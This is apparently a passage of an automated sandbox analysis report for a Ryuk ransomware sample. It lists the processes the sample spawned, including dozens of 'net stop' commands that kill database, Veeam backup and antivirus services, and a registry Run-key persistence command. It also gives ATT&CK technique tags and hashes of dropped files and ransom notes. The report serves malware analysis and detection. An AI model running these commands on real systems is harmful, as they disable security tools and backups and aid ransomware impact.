4⤵
PID:1764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
5⤵
PID:2392

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y
4⤵
PID:2544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
5⤵
PID:2576

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y
4⤵
PID:3004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
5⤵
PID:2464

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y
4⤵
PID:2520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
5⤵
PID:1288

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y
4⤵
PID:2876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
5⤵
PID:1372

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y
4⤵
PID:2456

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
5⤵
PID:2332

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y
4⤵
PID:1760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
5⤵
PID:2916

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y
4⤵
PID:1724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
5⤵
PID:2792

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y
4⤵
PID:2812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
5⤵
PID:2840

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
5⤵
PID:3056

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y
4⤵
PID:2604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
5⤵
PID:2388

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLBrowser /y
4⤵
PID:1840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
5⤵
PID:2928

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y
4⤵
PID:2904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
5⤵
PID:2924

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y
4⤵
PID:328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
5⤵
PID:2236

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y
4⤵
PID:2912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
5⤵
PID:2372

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y
4⤵
PID:2752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
5⤵
PID:2536

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLWriter /y
4⤵
PID:2756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
5⤵
PID:2188

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SstpSvc /y
4⤵
PID:2832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
5⤵
PID:1244

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop svcGenericHost /y
4⤵
PID:2152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
5⤵
PID:2512

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_filter /y
4⤵
PID:1640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
5⤵
PID:3012

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_service /y
4⤵
PID:2292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
5⤵
PID:2720

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_update_64 /y
4⤵
PID:2424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
5⤵
PID:1668

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TmCCSF /y
4⤵
PID:2592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
5⤵
PID:1228

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop tmlisten /y
4⤵
PID:1644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
5⤵
PID:2656

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TrueKey /y
4⤵
PID:3048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
5⤵
PID:2468

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y
4⤵
PID:2956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
5⤵
PID:2248

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y
4⤵
PID:1072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
5⤵
PID:2736

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop UI0Detect /y
4⤵
PID:2228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
5⤵
PID:3000

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y
4⤵
PID:1624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
5⤵
PID:1792

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y
4⤵
PID:1472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
5⤵
PID:2496

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y
4⤵
PID:2068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
5⤵
PID:3064

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y
4⤵
PID:2684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
5⤵
PID:2336

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y
4⤵
PID:1060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
5⤵
PID:1996

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y
4⤵
PID:2772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
5⤵
PID:2084

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y
4⤵
PID:2364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
5⤵
PID:960

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamMountSvc /y
4⤵
PID:2716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
5⤵
PID:2316

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y
4⤵
PID:2788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
5⤵
PID:2088

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y
4⤵
PID:2132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
5⤵
PID:828

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y
4⤵
PID:2000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
5⤵
PID:2300

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop W3Svc /y
4⤵
PID:1312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
5⤵
PID:2432

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop wbengine /y
4⤵
PID:428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
5⤵
PID:2668

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop WRSVC /y
4⤵
PID:2320

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
5⤵
PID:2244

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:3004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
5⤵
PID:2456

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:2332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
5⤵
PID:2128

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y
4⤵
PID:1760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
5⤵
PID:2824

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_update /y
4⤵
PID:2992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
5⤵
PID:1032

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y
4⤵
PID:1256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
5⤵
PID:1660

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y
4⤵
PID:544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
5⤵
PID:1896

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "SQL Backups" /y
4⤵
PID:540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQL Backups" /y
5⤵
PID:2588

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PROD /y
4⤵
PID:2624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
5⤵
PID:2924

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y
4⤵
PID:2572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
5⤵
PID:2344

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y
4⤵
PID:3032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
5⤵
PID:2832

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y
4⤵
PID:2360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
5⤵
PID:2212

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop msftesql$PROD /y
4⤵
PID:652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
5⤵
PID:2536

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop NetMsmqActivator /y
4⤵
PID:2200

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
5⤵
PID:1752

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EhttpSrv /y
4⤵
PID:1376

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
5⤵
PID:1120

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ESHASRV /y
4⤵
PID:1668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
5⤵
PID:1640

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ekrn /y
4⤵
PID:3040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
5⤵
PID:3012

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y
4⤵
PID:2616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
5⤵
PID:1632

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y
4⤵
PID:956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
5⤵
PID:2380

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop AVP /y
4⤵
PID:2324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AVP /y
5⤵
PID:2472

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop klnagent /y
4⤵
PID:1644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop klnagent /y
5⤵
PID:1972

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y
4⤵
PID:1672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
5⤵
PID:304

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y
4⤵
PID:2552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
5⤵
PID:2920

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop wbengine /y
4⤵
PID:2900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
5⤵
PID:2232

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop kavfsslp /y
4⤵
PID:1072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
5⤵
PID:2448

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop KAVFSGT /y
4⤵
PID:2496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
5⤵
PID:1816

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop KAVFS /y
4⤵
PID:2884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
5⤵
PID:2684

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mfefire /y
4⤵
PID:2340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
5⤵
PID:2420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\aCBlj.exe" /f
4⤵
PID:1540

C:\Windows\system32\reg.exe
REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\aCBlj.exe" /f
5⤵
- Adds Run key to start application
PID:2084

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "49292760911824047601713768551-13609149652138848815234813462-1354040014-1576991462"
1⤵
PID:2184

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "181265466510080933891153529039-744618971909865188-2087158886-1377079235-889850515"
1⤵
PID:3056

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1510268686-445233881-1370159665481753691688363120317980511-67886349724032549"
1⤵
PID:2784

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-484858561879949640-1080418893959233827-147140800636686608-606569290-1988301528"
1⤵
PID:616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1171676860-7570759481971276166205304423917764698770944631894004630702013179"
1⤵
PID:1348

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4440116541089757008-15396053451983307702-1450606030-177242504-1086286471-1072557347"
1⤵
PID:1792

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-108447273913969585782051962440-114552774117216242536031249777970416-1802442741"
1⤵
PID:2520

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3566714691190449294-58543920383428077-1095539277-52871211232210352587639592"
1⤵
PID:564

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-10431177411552466418331795750-310495189-1527028303-5069684551524641311-568838226"
1⤵
PID:1108

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "169745146617134351871613656063-1923302307-138210608624258488919213232921140672302"
1⤵
PID:2344

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16319317131452541462101579832-19734458471129945224-1323712742-18809400971898385953"
1⤵
PID:2696

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "773251363-19288581251597858232-504002407-1601479909-307220607-1597314872216337762"
1⤵
PID:1376

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-762841541-266297831178069147293928204-17062407038804013581543232989160746963"
1⤵
PID:1540

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1779867140894501814-1300322929-1677696514-18865677109654050578430534931966212799"
1⤵
PID:2240

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "669333195-8466812091403471957-8909091384140693852052656120198828894-716170236"
1⤵
PID:1172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-519124998-4852590601266036023194624404373557271-1224683684-2110210519-58311032"
1⤵
PID:2220

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1202454660-2099604210-2455088653512964011812725374184379081-17414225301455098644"
1⤵
PID:984

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "182717077917535517651387887679-1501132767-39551803817090868601260651582-1286587935"
1⤵
PID:2608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "408898415744717338844790787263843541136091916373031541-667261120-313541732"
1⤵
PID:2784

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15351565541867429891151073950740618644-186282481316631413631391871379435118000"
1⤵
PID:916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3399368681027089969-441866599-1035538011559769236-630773661183424059585915795"
1⤵
PID:2280

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "180725459-1602870377-3588563416371873369871340611913489780-369930237-143122945"
1⤵
PID:2576

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "975537676-840932900-17842381914226860101090063903-263633971-18005702491547281508"
1⤵
PID:1372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "117754715234638602-8554423571307663267856368871131070802859391077-634186041"
1⤵
PID:2792

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1412013668-14084596-1221082302-1705711239-767958842-2017669912-21199532-1310085423"
1⤵
PID:2916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1745562591152587442-330769118215442580-102786621877492116311809474701765536933"
1⤵
PID:2236

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1031718030-232794762147319524-2061205003-8855940801776124931606612105-604896792"
1⤵
PID:2388

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "128694380438776447313100743011272049313-612306023-8558954801198096464892876005"
1⤵
PID:832

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1167431056-808866167-761971904-1209379004181544782212958229981693238603-306006216"
1⤵
PID:2372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-682937783-8176710991108214549-2106705014184823273-12481773141191835683660454319"
1⤵
PID:1876

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-224819285-790500775-508688610316409205906497131-666465444487328479925455816"
1⤵
PID:2424

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-426506928168182492023625669122327775411035867772097355991-361951038929596916"
1⤵
PID:3048

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "51628524951035884126293087438907443020177063231900555200-14721554591946163253"
1⤵
PID:1472

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5582236121458453934127618460170431757421423869571357916918-2564199361685300056"
1⤵
PID:2452

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:2420

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Documents and Settings\RyukReadMe.txt
MD5
1e5d393290c87f1ccc62a1d3f89caf47

SHA1
87e6f98deeca6ed2ff27e7bfe8dd306b09bab088

SHA256
5971bf3131a292583967ee2ff687e7bf135930fe2bf5df76c6058852abdb7ace

SHA512
8a31e7240e0f52a02c73f8e83a7e8e749c035f773ba00474a7e35cb420a8b5ff1bf986fc3ff7831105d8bcab07c6a3c7f8af076623ab71b4216e33e916eb260e

Download Submit
C:\MSOCache\All Users\RyukReadMe.txt
MD5
1e5d393290c87f1ccc62a1d3f89caf47

SHA1
87e6f98deeca6ed2ff27e7bfe8dd306b09bab088

SHA256
5971bf3131a292583967ee2ff687e7bf135930fe2bf5df76c6058852abdb7ace

SHA512
8a31e7240e0f52a02c73f8e83a7e8e749c035f773ba00474a7e35cb420a8b5ff1bf986fc3ff7831105d8bcab07c6a3c7f8af076623ab71b4216e33e916eb260e

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab
MD5
321013f27cd1a04b6ea3a0a40c7e9ace

SHA1
43dfcc1adf5a05a08b6379993de4aa01b7e7b52a

SHA256
af4375540573addffd645de307252f95dde017082de91a15bf2c6776527eb93d

SHA512
734d8ec024146d6accbdc8d43c97fa5b4b6446cbb06d2e0240a47bef0647a357da46b1c2e8c44f2229960016bcd23cd4534c73b01115f5c2437c684c9634bec8

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.msi
MD5
2db78a1e38023259f21323a0ee6eb45e

SHA1
ec71abcc42c441244a16643fcd4749dfc95050f8

SHA256
5029d09c18d445c87af875652342c53ffebaaf94a952f7fa5cdb61c27bdf98eb

SHA512
7b2d354d5b6a3b93f38a271441b4f4964869bef3bc5adc83df373c227674b4efa25d0d588892e1eaca3f4bbf24fbb126e638470b81c19404eeb01771a4d3b4ec

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml
MD5
260ae65ae29cf127dd7efee358d8ffea

SHA1
12a3c7225de4d9da97dc1c22181ba5977f979bd1

SHA256
ebc1b3c9f1e8c3cc92e92fb067b3e0eeb79c768f7501d2a96994c5529dad0909

SHA512
13931aa443cb945422a640c418d999f05cfd41ef0aeff3730f2877c9aa4814a04810281a8a79010cb76f194fda8ad93ee556c3e667cba1c700878c7f4683faaa

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi
MD5
a2f993e7d50a645c99addd07b6690dd4

SHA1
34e0a60d8889753e7af39c2ed1bf5b4478ccfd7b

SHA256
91b5597c66e9e6d0e25c3f567413cf5bf5aae023740ba3e0dbfbfeef19a16248

SHA512
2270997f4a1ddf3b42e57b423b9aeacd7b09007eb75a7a4392e834fc5081fc343182e48375b2054f6a1057b3910edb41d41926cd574c1402821dc246f89715f0

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml
MD5
194053ab713a9beefba69a7dc9abfcff

SHA1
9a8b0f83c415e0ad85fe8bf981ed47ace492c5ec

SHA256
c7aea77518f07a7489b7144ad2a75223d855ceef7389418870e3c2e73496be7a

SHA512
0caaee63d2cd552975b5b64d1b63df79fc4dc653920a2f09b84aaf398ea708d9721f54770144207726afb8466e284c26b96f1c4773bef001db5cac5e2230453c

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW.cab
MD5
5e32244c7913c00d64d62fadba31b3e6

SHA1
a3e305368f052995d211f195c393496ccb2035ae

SHA256
406709b083f29e13696a7b7c4e1b7c25e720ea924ffc80a6438c0b9ecab686e5

SHA512
7a37dc39b823a315d6560b2be48388e27bfe816ac195f1a74308542e145336429ff320945af2525b2128b1e78a8b3b898515a362fee4375387a1e25a5bfe006c

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW2.cab
MD5
d53ac77d4b3fea3b2b20ab5e44d0d962

SHA1
39de8ce5a99e50b167d908af8f362e09a96fa66c

SHA256
c8afb89435339da2c6015003f644bb6f95be16d63af46aa782187c2498184f8d

SHA512
781fafa42f11e734ef832e948659df7e9630fe7aaa66c420b6635ae9b39aa8a6d7345b7490f5b33439e2f39a70ae6f9774a57abb8d4ebef12a1344be78389757

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\RyukReadMe.txt
MD5
1e5d393290c87f1ccc62a1d3f89caf47

SHA1
87e6f98deeca6ed2ff27e7bfe8dd306b09bab088

SHA256
5971bf3131a292583967ee2ff687e7bf135930fe2bf5df76c6058852abdb7ace

SHA512
8a31e7240e0f52a02c73f8e83a7e8e749c035f773ba00474a7e35cb420a8b5ff1bf986fc3ff7831105d8bcab07c6a3c7f8af076623ab71b4216e33e916eb260e

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml
MD5
a75ef4d8dc1e1257bad3a7003acc2f56

SHA1
bec1ebb944a266bfa994be60ba50d44e0799feb6

SHA256
3a7a8f368cd35e9da433690f262a4042b29e86e2a3b46c36d777fa70f0631d95

SHA512
0b74f6a49a27febe23e9e116ed25c8927a3969a48d84be78a5e644115caad24dcf062cdeff24fc928fea165001c0e9c7b97a7d455df1a754f7e4eba7347a549c

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\pkeyconfig-office.xrm-ms
MD5
5b2527637df25c08390be30bdfd38adf

SHA1
c8c543ec9af43daa18790df7fb1cbac729943dd2

SHA256
940edf37cfa3a69c9a53bd232be885a06d54e1aaf332eacdc338778735ccc356

SHA512
405fe70f3faff87cecc378e088aa32e09e242c6c30eef61347eb7386a61ee9e7a0ebab54979b5cae77e3f94bf0fbcf00ad4d56f6ddb831ae6f38d79c5203c925

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelLR.cab
MD5
d3adacedc85511bed93d22c85dbf078d

SHA1
b13e7276c08bbf1c668b10736df0e8f7abc83bef

SHA256
f32d246e265b6d41388445710305ca75120e9520d3c12589158f2195cdd9c109

SHA512
bed7637be8c632f6d0b0e979ea3b37bcffc4f6ba8dab742e568d4fae776e6d4985e97d4de3bd72779a192459fa9aefdb7c65e8ef70116e47b61d70252bd61079

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi
MD5
98c1a90f7ba909a61557b4df17a9213e

SHA1
3581c6340a4b5875aeeb9bb2cf68e24cd5ad969d

SHA256
2dd3f0889cdf9baa4e9e9902591aeeae59331f75dc55f0322bf1fb18277ed9bd

SHA512
5b66559f9e68e1064d77236a5ed12cf55efc3b385bd38fea8c82434d7adf68b9f8d2d5dddc3c234f0230181fbc4541c46078c788a1a0d760ecd15b753c36b43b

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml
MD5
40bfd5a05516cc4421fcc5365b8634e2

SHA1
5aaa1ff9d03919c6d36a1199ded3868f4e8b9269

SHA256
7e6ede9a0fdcd2992538845454b7ace4feb692b4dfa22adf7fa27b0185938192

SHA512
f0db3b40da75c7a8c3a1ff371bd64c4ee254ebed1d6e381916cd377555715a0b7f2f83f8043efc641d161b70b344acea23670a741ee98d583adf7662d08de48b

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\RyukReadMe.txt
MD5
1e5d393290c87f1ccc62a1d3f89caf47

SHA1
87e6f98deeca6ed2ff27e7bfe8dd306b09bab088

SHA256
5971bf3131a292583967ee2ff687e7bf135930fe2bf5df76c6058852abdb7ace

SHA512
8a31e7240e0f52a02c73f8e83a7e8e749c035f773ba00474a7e35cb420a8b5ff1bf986fc3ff7831105d8bcab07c6a3c7f8af076623ab71b4216e33e916eb260e

Download Submit
